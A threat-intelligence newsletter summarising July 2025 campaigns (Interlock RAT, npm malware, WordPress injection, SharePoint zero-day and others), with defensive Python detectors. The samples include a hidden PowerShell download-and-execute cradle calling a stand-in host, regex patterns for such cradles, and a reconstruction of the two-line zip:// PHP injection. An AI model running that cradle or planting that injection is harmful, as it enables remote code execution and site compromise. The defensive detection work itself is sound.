Anomali Cyber Watch: Interlock RAT, North Koreans Flood npm Registry, Stealthy WordPress PHP Malware, and Semiconductor Sector Hacks


The July 22nd edition of Anomali Cyber Watch covers the following topics: Interlock Remote Access Trojan (RAT), North Korean threat actors, WordPress PHP Malware, a malicious Cursor AI IDE extension, semiconductor sector attacks, hyper-volumetric DDoS attacks, the GhostContainer backdoor, Katz Stealer, a cryptojacking campaign, and a Microsoft SharePoint Zero-Day vulnerability. The IoCs related to these stories are referenced below and can be used by Anomali ThreatStream users to analyze potential malicious activity.
New PHP-Based Interlock RAT Variant Uses FileFix Delivery Mechanism to Target Multiple Industries
(published: July 14, 2025)
Threat actors linked to the Interlock ransomware gang have introduced a new PHP-based variant of their custom Remote Access Trojan (RAT), delivered through a refined social-engineering method called “FileFix.” Beginning around May 2025, attackers have been compromising legitimate websites, injecting scripts that redirect visitors to fake CAPTCHA pages. Users are then tricked into pasting commands into File Explorer, triggering a PowerShell script that installs the PHP RAT. Once executed, the malware performs detailed system reconnaissance (including privilege checks), exfiltrates data in JSON format, and establishes command-and-control channels via Cloudflare Tunnel with fallback IPs. It can download additional payloads, modify registry settings for persistence, and use RDP for lateral movement. A PHP variant may also serve as a precursor to deploying the Node.js-based RAT variant known as NodeSnake. Features like Cloudflare Tunnel obfuscation and dual-language architecture underscore Interlock’s evolving sophistication and broad targeting across industries.
Analyst Comment: This attack leans on simple user behavior rather than flashy exploits, which makes it easy to miss and hard to stop. Asking someone to paste a command into File Explorer may not raise alarms for some, but it should. The switch to a PHP-based RAT gives attackers more flexibility, especially when paired with hidden tunnels like Cloudflare. To stay ahead, tighten controls around PowerShell use, monitor unusual clipboard or browser activity, and most importantly, teach users to pause when a website asks them to run anything locally.
MITRE ATT&CK: T1204 - User Execution | T1059.001 - Command and Scripting Interpreter: PowerShell | T1059.003 - Command and Scripting Interpreter: Windows Command Shell | T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | T1082 - System Information Discovery | T1083 - File And Directory Discovery | T1016 - System Network Configuration Discovery | T1057 - Process Discovery | T1087 - Account Discovery | T1069.001 - Permission Groups Discovery: Local Groups | T1090.004 - Proxy: Domain Fronting | T1041 - Exfiltration Over C2 Channel | T1021.001 - Remote Services: Remote Desktop Protocol
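A command pasted into the File Explorer address bar runs as a child of explorer.exe, so one place to look for FileFix-style execution is the parent/child relationship of shell processes. The following Python is an added detection example, not code from Anomali or from the Interlock research: it scores constructed process-creation events, and the command-line indicators it looks for (hidden window, encoded command, download cradle) are assumed heuristics rather than indicators published with the report.

```python
"""Added example (not from Anomali or the Interlock research): flag shells
spawned directly by explorer.exe, the execution path a FileFix lure relies on.
Event records are constructed; command-line indicators are assumed heuristics."""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str
    user: str


# Assumed heuristics: hidden window, encoded command, download cradle.
SUSPICIOUS_ARGS = re.compile(
    r"(-w(?:indowstyle)?\s+hidden"
    r"|-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"
    r"|\biwr\b|invoke-webrequest|downloadstring|\biex\b|invoke-expression"
    r"|-nop\b)",
    re.IGNORECASE,
)
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev: ProcessEvent) -> list:
    """Return the reasons an event looks like FileFix-style execution."""
    reasons = []
    if basename(ev.parent_image) == "explorer.exe" and basename(ev.image) in SHELLS:
        reasons.append("shell spawned directly by explorer.exe")
    if SUSPICIOUS_ARGS.search(ev.command_line):
        reasons.append("hidden/encoded invocation or download cradle")
    return reasons


def find_filefix_candidates(events):
    """Return (severity, event, reasons). 'high' requires both signals, because
    users also start PowerShell from Explorer for legitimate reasons."""
    findings = []
    for ev in events:
        reasons = score_event(ev)
        if reasons:
            findings.append(("high" if len(reasons) == 2 else "low", ev, reasons))
    return findings


# Constructed sample events (Sysmon/EDR-style fields), not real telemetry.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", PS,
                 'powershell.exe -w hidden -c "iwr http://c2.example.invalid/l.ps1 | iex"', "jdoe"),
    ProcessEvent(r"C:\Windows\explorer.exe", PS, "powershell.exe", "jdoe"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", PS,
                 "powershell.exe -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA", "svc-build"),
    ProcessEvent(r"C:\Program Files\Git\usr\bin\bash.exe", PS,
                 "powershell.exe -NoProfile -File build.ps1", "svc-build"),
]

if __name__ == "__main__":
    for severity, ev, reasons in find_filefix_candidates(SAMPLE_EVENTS):
        print(severity, ev.user, basename(ev.image), "|", "; ".join(reasons))
```

Only the first constructed event reaches "high": the shell has explorer.exe as its parent and carries a hidden-window download cradle. A plain PowerShell console opened from Explorer and an encoded command launched from cmd.exe each trip one signal and are reported "low" for triage rather than alerting on their own.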
North Korean Hackers Flood npm Registry with XORIndex Malware
(published: July 15, 2025)
North Korean state‑sponsored actors, tied to the “Contagious Interview” campaign, have uploaded 67 malicious packages to the npm repository. These packages have been downloaded over 17,000 times. They deploy a novel obfuscated loader known as XORIndex, alongside older loaders like HexEval, to profile systems and fetch second-stage malware, primarily the BeaverTail information stealer and subsequent InvisibleFerret backdoor. The attackers use social engineering tactics, impersonating recruiters on platforms such as LinkedIn and Discord, to convince developers to install these packages as part of fake “coding assignments”. XORIndex utilizes Vercel-hosted command-and-control infrastructure and sophisticated obfuscation, marking a clear escalation in North Korea’s software supply chain strategies. Despite takedown efforts, remnants of the campaign linger, with attackers poised to release fresh variants via new aliases.
Analyst Comment: This campaign blends technical stealth with smart social engineering, turning developer curiosity into a foothold for compromise. By framing malicious packages as coding assignments from fake recruiters, the attackers sidestepped traditional defenses and went straight for trust. XORIndex adds another layer of complexity, using obfuscation and legitimate cloud services to stay hidden. This isn’t just a supply-chain problem; it’s a people problem. Defenders need to pair technical controls like package vetting and network monitoring with clear internal guidance on how to handle unsolicited outreach and code from unknown sources.
MITRE ATT&CK: T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain | T1059.006 - Command and Scripting Interpreter: Python | T1082 - System Information Discovery | T1071.001 - Application Layer Protocol: Web Protocols | T1105 - Ingress Tool Transfer | T1555 - Credentials From Password Stores | T1041 - Exfiltration Over C2 Channel | T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Stealthy PHP Malware Uses ZIP Archive to Redirect WordPress Visitors
(published: July 15, 2025)
A newly identified malware campaign targets WordPress sites by injecting two lines of PHP into the wp-settings.php core file. One line extracts the site's domain from the HTTP_HOST header, while the other uses PHP’s zip:// wrapper to include a domain-specific file hidden within a win.zip archive. The extracted PHP payload is heavily obfuscated and conducts visitor-specific redirects, dynamically selects Command‑and‑Control (C2) servers, avoids bots like Googlebot, injects malicious sitemaps into robots.txt, and manipulates SEO files. The attack’s main goal is search‑engine poisoning—leveraging compromised site trust to promote spam or malicious domains. Indicators of compromise include domain-named entries in win.zip and modified core files.
Analyst Comment: By injecting spam content and fake sitemaps, the malware exploits a site’s reputation to boost malicious domains in search results. That damage lingers long after cleanup, especially if your site gets flagged by search engines or browsers. The use of ZIP-based payloads, layered obfuscation, and bot evasion means most owners won’t spot it without expert help. Staying ahead of this kind of threat takes layered defense: keep WordPress and plugins updated, use only trusted sources, enforce strong passwords and 2FA, and deploy a web application firewall. Regular scans help, but file integrity monitoring and outbound traffic checks are just as important.
MITRE ATT&CK: T1190 - Exploit Public-Facing Application | T1059.005 - Command and Scripting Interpreter: Visual Basic | T1505.003 - Server Software Component: Web Shell | T1027 - Obfuscated Files Or Information | T1222.002 - File and Directory Permissions Modification: Linux And Mac File And Directory Permissions Modification | T1036 - Masquerading | T1071.001 - Application Layer Protocol: Web Protocols | T1491.002 - Defacement: External Defacement
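The injection described above has a recognisable shape: a core file reading HTTP_HOST and an include through PHP's zip:// wrapper, with the archive holding one entry per targeted hostname. The following Python is an added example, not code from Anomali or from the original researchers: it scans a constructed wp-settings.php for those two statements and lists archive entries named after hostnames the site serves. The regexes are assumed shapes of the injected lines; comparing the file against a pristine copy of the same WordPress release remains the authoritative check.

```python
"""Added example (not Anomali's code or the original researchers'): detect the
two-line wp-settings.php injection and list archive entries named after the
site's own hostnames. File content and archive below are constructed."""
import io
import re
import zipfile

# Assumed shapes of the two injected statements.
HOST_READ = re.compile(r"\$_SERVER\s*\[\s*['\"]HTTP_HOST['\"]\s*\]")
ZIP_INCLUDE = re.compile(
    r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]zip://", re.IGNORECASE)


def scan_core_file(source: str):
    """Return (line number, reason) for each line matching an injection pattern."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        if HOST_READ.search(line):
            findings.append((lineno, "reads HTTP_HOST"))
        if ZIP_INCLUDE.search(line):
            findings.append((lineno, "includes code through the zip:// wrapper"))
    return findings


def entries_named_after_hosts(zip_bytes: bytes, served_hosts):
    """Archive entries whose file name equals a hostname this site serves."""
    served = {h.lower() for h in served_hosts}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [n for n in zf.namelist() if n.rsplit("/", 1)[-1].lower() in served]


# Constructed wp-settings.php fragment with the two injected lines (6 and 7).
SAMPLE_WP_SETTINGS = """<?php
/**
 * Used to set up and fix common variables and include
 * the WordPress procedural and class library.
 */
$h = $_SERVER['HTTP_HOST'];
@include('zip://' . __DIR__ . '/win.zip#' . $h);
define( 'WPINC', 'wp-includes' );
require ABSPATH . WPINC . '/version.php';
"""


def build_sample_archive() -> bytes:
    """Constructed win.zip: one entry per targeted hostname plus a decoy."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("example.com", "<?php /* constructed stand-in for the payload */")
        zf.writestr("shop.example.net", "<?php /* constructed stand-in for the payload */")
        zf.writestr("readme.txt", "unrelated entry")
    return buf.getvalue()


if __name__ == "__main__":
    for lineno, reason in scan_core_file(SAMPLE_WP_SETTINGS):
        print(f"wp-settings.php:{lineno}: {reason}")
    hosts = ["example.com", "www.example.com", "shop.example.net"]
    print("suspicious win.zip entries:", entries_named_after_hosts(build_sample_archive(), hosts))
```

A clean WordPress install ships no win.zip at all, so the archive's mere presence in the web root is worth a look; the entry check narrows the triage to files that can only be there to serve a redirect for this site's own hostnames.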
Malicious VSCode Extension in Cursor AI IDE Leads to $500K Crypto Theft
(published: July 18, 2025)
A malicious “Solidity Language” extension, distributed via the Open VSX registry for the Cursor AI IDE (a VSCode-based environment), infected developer systems with a multi-stage malware chain. After installation, the extension’s extension.js script executed a remote PowerShell payload from angelic[.]su, installed ScreenConnect for persistence, and deployed VBScript loaders. These payloads installed Quasar RAT and the PureLogs stealer, enabling attackers to extract browser cookies, credentials, and crypto-wallet seed phrases. One Russian blockchain developer lost roughly $500,000 in cryptocurrency. The fake extension had been downloaded over 54,000 times before removal and shortly reappeared under a look‑alike name (“solidity”) with nearly 2 million installs—highlighting deliberate manipulation of trust and search rankings in the Open VSX ecosystem.
Analyst Comment: This attack again shows how easily trust can be exploited in developer tools. A plugin that looks helpful and popular can quietly open the door to full compromise. It is a reminder that even experienced users can be caught out when familiar platforms are abused. To reduce risk, teams should vet extensions more carefully, limit what they can access, and use behavior monitoring to catch anything unusual early. Managing your own trusted plugin list and avoiding direct installs from public registries can also help keep environments cleaner and more secure.
MITRE ATT&CK: T1059.001 - Command and Scripting Interpreter: PowerShell | T1105 - Ingress Tool Transfer | T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Chinese Hackers Target Taiwan's Semiconductor Sector with Cobalt Strike, Custom Backdoors
(published: July 17, 2025)
Taiwan’s critical semiconductor infrastructure has been recently targeted by at least three distinct Chinese state-sponsored threat actors, including one labeled UNK_FistBump. Between March and July 2025, these attackers deployed spear-phishing campaigns disguised as employment inquiries to trick victims into executing Cobalt Strike payloads or a bespoke C-based backdoor named “Voldemort.” Targets include semiconductor design, packaging, manufacturing and supply-chain firms. These operations indicate ongoing strategic cyber espionage aimed at extracting proprietary semiconductor intellectual property and compromising critical supply-chain components.
Analyst Comment: Masquerading as graduate jobseekers, the attackers targeted HR teams with LNK files disguised as resumes, a trusted entry point often overlooked in security planning. Once opened, the file launched a multi-stage payload while displaying a decoy document to keep suspicion low. This isn’t just clever social engineering; it’s targeted misuse of everyday business processes. HR-facing workflows, especially those involving file handling, need tighter scrutiny. Security awareness can’t stop at IT; teams handling unsolicited documents must be part of the threat model. Detection helps, but prevention here starts with better internal process design.
MITRE ATT&CK: T1566.001 - Phishing: Spearphishing Attachment | T1566.002 - Phishing: Spearphishing Link | T1566.003 - Phishing: Spearphishing Via Service | T1204.002 - User Execution: Malicious File | T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking | T1071.001 - Application Layer Protocol: Web Protocols | T1041 - Exfiltration Over C2 Channel | T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | T1059.005 - Command and Scripting Interpreter: Visual Basic | T1219 - Remote Access Software
Hyper‑Volumetric DDoS Attacks Reach Record 7.3 Tbps
(published: July 15, 2025)
Cloudflare has reported a sharp evolution in DDoS tactics, marked by short-burst “hyper-volumetric” attacks that peaked at 7.3 terabits per second and 4.8 billion packets per second. These surges, lasting less than a minute, are designed to overwhelm defenses before automated mitigation systems can respond. The infrastructure behind them is changing too—botnets are now increasingly powered by compromised cloud-hosted virtual machines alongside traditional IoT devices. New attack vectors like Teeworlds, VxWorks floods, and legacy RIPv1 protocols are being abused to evade filters and exploit unpatched services. While the total number of HTTP DDoS attacks declined this quarter, ransom-based attacks rose by 68%, showing a shift in motive from disruption to extortion. Telecommunications, hosting, and gaming sectors were the most frequently targeted.
Analyst Comment: Short-burst, high-volume DDoS attacks are designed to overwhelm defenses before automated mitigation can respond. Traditional rate-based detection often misses these brief spikes. Organizations should adopt real-time anomaly detection, disable unused or legacy protocols like RIPv1, and harden exposed services at the edge. DDoS response plans must be tested regularly and include coordination with upstream providers. With ransom-based DDoS threats on the rise, these attacks should be treated as part of broader extortion risk, not just network noise.
MITRE ATT&CK: T1498 - Network Denial Of Service | T1498.001 - Network Denial of Service: Direct Network Flood | T1498.002 - Network Denial of Service: Reflection Amplification
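The timing argument in the analyst comment can be made concrete. The following Python simulation is an added example, not code from Cloudflare or Anomali: it runs a constructed per-second packet-rate series containing a 45-second burst at the reported 4.8 billion packets per second through two detectors, one that checks the average of each 60-second window and one that keeps a per-second EWMA baseline. The baseline rate, threshold, smoothing factor and burst placement are assumed values.

```python
"""Added example (not Cloudflare's or Anomali's code): detection latency of a
fixed-window rate check versus a per-second streaming baseline on a
constructed packet-rate series. Rates, threshold and smoothing are assumed."""
import random

BURST_PPS = 4_800_000_000   # peak packet rate reported by Cloudflare
BASELINE_PPS = 50_000       # assumed normal rate for this edge


def make_series(seconds=180, burst_start=70, burst_len=45, seed=1):
    """Per-second packet counts: jittered baseline with one short burst."""
    rng = random.Random(seed)
    series = []
    for t in range(seconds):
        if burst_start <= t < burst_start + burst_len:
            series.append(BURST_PPS)
        else:
            series.append(int(BASELINE_PPS * (0.9 + 0.2 * rng.random())))
    return series


def windowed_detector(samples, window=60, threshold=1_000_000):
    """Classic rate check: the mean over each complete window is compared to a
    threshold, so an alert cannot fire before the window closes."""
    for end in range(window, len(samples) + 1, window):
        if sum(samples[end - window:end]) / window > threshold:
            return end
    return None


def streaming_detector(samples, alpha=0.1, factor=10.0, warmup=10):
    """Per-second EWMA baseline; alert as soon as one sample exceeds
    factor times the learned baseline (after a short warm-up)."""
    baseline = samples[0]
    for t, x in enumerate(samples[1:], 1):
        if t >= warmup and x > factor * baseline:
            return t
        baseline = alpha * x + (1 - alpha) * baseline
    return None


def compare(burst_start=70, burst_len=45):
    """Alert times of both detectors relative to the burst boundaries."""
    samples = make_series(burst_start=burst_start, burst_len=burst_len)
    burst_end = burst_start + burst_len
    w = windowed_detector(samples)
    s = streaming_detector(samples)
    return {
        "windowed_alert_at": w,
        "windowed_seconds_after_burst_ended": None if w is None else w - burst_end,
        "streaming_alert_at": s,
        "streaming_seconds_into_burst": None if s is None else s - burst_start,
    }


if __name__ == "__main__":
    for key, value in compare().items():
        print(f"{key}: {value}")
```

With the burst occupying seconds 70 to 114, the windowed check only sees it when the 60 to 119 window closes at second 120, five seconds after the traffic has already stopped; the streaming baseline alerts at second 70. The mean over the window is still enormous, so the spike is not "missed" in the sense of never being noticed, but any mitigation it triggers arrives after the damage is done, which is the point the comment makes.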
GhostContainer backdoor compromises Microsoft Exchange in Asia
(published: July 17, 2025)
A newly identified backdoor, named GhostContainer, targets Microsoft Exchange servers, primarily within government and high-tech organizations in Asia. Discovered during an incident response in mid-July, the malware leverages a known Exchange “N-day” vulnerability (likely CVE-2020-0688), disguises itself as a legitimate server component, and uses open-source code for modular, extensible control. It bypasses detection by disabling AMSI and Windows event logging, then establishes covert command-and-control via HTTP requests containing encoded payloads. GhostContainer consists of three main functional classes: a C2 parser and dispatcher (“Stub”), a virtual page injector, and a web proxy/tunnel module derived from Neo-reGeorg. It allows full server compromise, command execution, data exfiltration, tunneling, and uses stolen ASP.NET machine keys for encrypted communications. Victims include at least one government agency and a high-tech firm. Attribution remains unclear, but evidence suggests a mature, professional APT actor.
Analyst Comment: GhostContainer highlights how attackers continue to exploit known Exchange flaws by embedding stealthy, modular implants into trusted server components. Its use of open-source tools and legitimate ASP.NET structures makes detection difficult in environments that assume they are secure. Patching is necessary but not enough. Defenders should hunt for rogue ASPX pages, suspicious DLLs, and unexpected proxy behavior. Monitoring for unusual headers like “Qprtfva” and reviewing machineKey configurations can help uncover compromise. GhostContainer is a reminder that mature threat actors often rely on overlooked systems and blind spots rather than novel techniques.
MITRE ATT&CK: T1190 - Exploit Public-Facing Application | T1059 - Command And Scripting Interpreter | T1620 - Reflective Code Loading | T1562.001 - Impair Defenses: Disable Or Modify Tools | T1562.002 - Impair Defenses: Disable Windows Event Logging | T1562.006 - Impair Defenses: Indicator Blocking | T1134.002 - Access Token Manipulation: Create Process With Token | T1550 - Use Alternate Authentication Material | T1090.003 - Proxy: Multi-Hop Proxy | T1041 - Exfiltration Over C2 Channel
Katz Stealer Infostealer Expands Across Credentials & Crypto
(published: July 17, 2025)
Katz Stealer, a powerful information-stealer offered as Malware-as-a-Service (MaaS), has rapidly gained traction since its launch in early 2025. It is marketed affordably via Telegram, Discord, and cybercrime forums, featuring a web-based control panel that enables users to build customized payloads, manage campaigns, and exfiltrate data. Katz employs multi-stage infection: phishing emails deliver obfuscated JavaScript droppers that load a steganographically concealed payload via PowerShell. A UAC bypass using cmstp.exe leads to process-hollowing into MSBuild.exe for stealth. The stealer focuses on browser-stored credentials (defeating encryption mechanisms), crypto wallets (desktop and browser extensions), messaging platforms, system credentials, screenshots, clipboard data, and audio/video captures. Persistent C2 channels use unique user-agents for hiding, and the malware cleans up traces post-exfiltration. Its low price and turnkey design are driving widespread adoption by both novice and advanced threat actors.
Analyst Comment: Katz Stealer shows how advanced malware is becoming easy to access and use, lowering the barrier for cybercrime. Its stealthy delivery and broad targeting make it effective across user types. Defenders should focus on phishing awareness, disable unnecessary scripting engines, and enforce application controls. Use browser hardening and avoid storing credentials locally.
MITRE ATT&CK: T1204.001 - User Execution: Malicious Link | T1059.007 - Command and Scripting Interpreter: JavaScript | T1218.003 - Signed Binary Proxy Execution: Cmstp | T1055.012 - Process Injection: Process Hollowing | T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | T1555.003 - Credentials from Password Stores: Credentials From Web Browsers | T1555.004 - Credentials from Password Stores: Windows Credential Manager | T1113 - Screen Capture | T1115 - Clipboard Data | T1123 - Audio Capture | T1125 - Video Capture | T1041 - Exfiltration Over C2 Channel | T1027.001 - Obfuscated Files or Information: Binary Padding | T1036.002 - Masquerading: Right-To-Left Override
3,500 Websites Hijacked to Secretly Mine Crypto Using Stealth JavaScript and WebSocket Tactics
(published: July 20, 2025)
Over 3,500 websites have been compromised in a widespread cryptojacking campaign. Attackers injected obfuscated JavaScript miners that leverage Web Workers and WebSockets to covertly mine Monero or similar coins via site visitors’ browsers. The script adapts to device performance, throttling CPU use to avoid detection. It pulls mining tasks from attacker-controlled infrastructure and uses stealth techniques to remain hidden. Notably, the same malicious infrastructure has previously hosted Magecart skimming tools, highlighting a dual-use setup aimed at maximising profits.
Analyst Comment: This campaign shows how cryptojacking has matured. Instead of drawing obvious attention through high CPU usage, the malware adapts its resource use to avoid suspicion. The reuse of Magecart-linked domains suggests a deliberate effort to build versatile infrastructure for multiple revenue streams. Defenders should monitor for suspicious WebSocket traffic, audit third-party scripts, and enforce strict Content Security Policies. Prevention now relies less on detecting obvious resource abuse and more on spotting subtle behavioural anomalies in client-side traffic.
MITRE ATT&CK: T1190 - Exploit Public-Facing Application | T1059.007 - Command and Scripting Interpreter: JavaScript | T1505.003 - Server Software Component: Web Shell | T1071.001 - Application Layer Protocol: Web Protocols | T1496 - Resource Hijacking | T1027 - Obfuscated Files Or Information | T1497.001 - Virtualization/Sandbox Evasion: System Checks
Microsoft SharePoint Zero‑Day Under Active Exploitation
(published: July 20, 2025)
A critical zero-day vulnerability (CVE-2025-53770) in on-premises Microsoft SharePoint Server is being actively exploited. The flaw, stemming from insecure deserialization, allows unauthenticated remote code execution and theft of machine keys. Attackers have deployed stealthy webshells such as spinstall0.aspx to extract cryptographic secrets, enabling persistent access and lateral movement. Hundreds of global organizations including U.S. federal and state agencies, energy firms, universities, telecoms, and European governments have been compromised since at least July 18 to 19. Although SharePoint Online remains safe, on-premises servers running 2016, 2019, and Subscription Edition are at risk.
Analyst Comment: The real risk here is not just code execution but the theft of machine keys, which allows attackers to maintain access even after patching. If you are running affected SharePoint servers, treat this as an active compromise. Rotate keys, check for webshells, and do not rely on patching alone. Public-facing systems should be isolated, and Defender with AMSI enabled provides a strong first layer of defense.
MITRE ATT&CK: T1190 - Exploit Public-Facing Application | T1059.005 - Command and Scripting Interpreter: Visual Basic | T1505.003 - Server Software Component: Web Shell | T1556.001 - Modify Authentication Process: Domain Controller Authentication | T1552.004 - Unsecured Credentials: Private Keys | T1550.003 - Use Alternate Authentication Material: Pass The Ticket | T1036.005 - Masquerading: Match Legitimate Name Or Location
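The GhostContainer comment above recommends hunting for rogue ASPX pages and reviewing machineKey configurations, and the SharePoint comment recommends checking for webshells such as spinstall0.aspx and rotating keys. The following Python script serves both and is an added example, not code from Microsoft, the reporting vendors, or Anomali: it compares every .aspx file under a web root with a known-good manifest of hashes and reports whether a web.config carries static machine keys, which stolen-key scenarios like these require rotating. The directory tree, manifest, key values and web.config are constructed; only the spinstall0.aspx name comes from the report, and the TEMPLATE/LAYOUTS directory is used as an illustrative location.

```python
"""Added example (not Microsoft's, the reporting vendors' or Anomali's code):
hunt for .aspx files absent from or differing from a known-good manifest, and
review machineKey settings in web.config. Tree, manifest and config are
constructed; only the spinstall0.aspx name comes from the SharePoint report."""
import hashlib
import os
import shutil
import tempfile
import xml.etree.ElementTree as ET

KNOWN_WEBSHELL_NAMES = {"spinstall0.aspx"}  # file name from the report


def sha256_of(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def hunt_aspx(root: str, manifest: dict):
    """Compare each .aspx under root with manifest {relative path: sha256}."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".aspx"):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if name.lower() in KNOWN_WEBSHELL_NAMES:
                findings.append((rel, "known webshell file name"))
            elif rel not in manifest:
                findings.append((rel, "not in manifest"))
            elif manifest[rel] != sha256_of(full):
                findings.append((rel, "content differs from manifest"))
    return sorted(findings)


def audit_machine_key(web_config_xml: str):
    """Report each machineKey element: static keys must be rotated after theft."""
    results = []
    for mk in ET.fromstring(web_config_xml).iter("machineKey"):
        results.append({
            "static_keys": not mk.get("validationKey", "AutoGenerate").startswith("AutoGenerate"),
            "validation": mk.get("validation", "(default)"),
            "decryption": mk.get("decryption", "(default)"),
        })
    return results


# Constructed web.config with obviously placeholder key material.
SAMPLE_WEB_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="PLACEHOLDER_VALIDATION_KEY_NOT_REAL"
                decryptionKey="PLACEHOLDER_DECRYPTION_KEY_NOT_REAL"
                validation="HMACSHA256" decryption="AES" />
  </system.web>
</configuration>
"""


def build_sample_site():
    """Constructed tree: one baselined page later modified, one webshell-named
    file and one unknown page. Returns (root, manifest taken before tampering)."""
    root = tempfile.mkdtemp(prefix="layouts_")
    layouts = os.path.join(root, "TEMPLATE", "LAYOUTS")
    os.makedirs(layouts, exist_ok=True)
    legit = os.path.join(layouts, "default.aspx")
    with open(legit, "w") as f:
        f.write("<%@ Page Language=\"C#\" %>\n")
    manifest = {"TEMPLATE/LAYOUTS/default.aspx": sha256_of(legit)}
    with open(legit, "a") as f:
        f.write("<!-- constructed modification -->\n")
    for name in ("spinstall0.aspx", "debug_x.aspx"):
        with open(os.path.join(layouts, name), "w") as f:
            f.write("<%@ Page Language=\"C#\" %>\n")
    return root, manifest


def cleanup(root: str) -> None:
    shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    root, manifest = build_sample_site()
    for rel, reason in hunt_aspx(root, manifest):
        print(f"{rel}: {reason}")
    print(audit_machine_key(SAMPLE_WEB_CONFIG))
    cleanup(root)
```

The manifest should be produced from a clean installation of the same product build, not from the suspect server, and the machineKey report is only useful if it drives action: a static key that may have been read out by a webshell stays valid for forging authentication material until it is rotated, which is why the SharePoint guidance above treats patching alone as insufficient.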
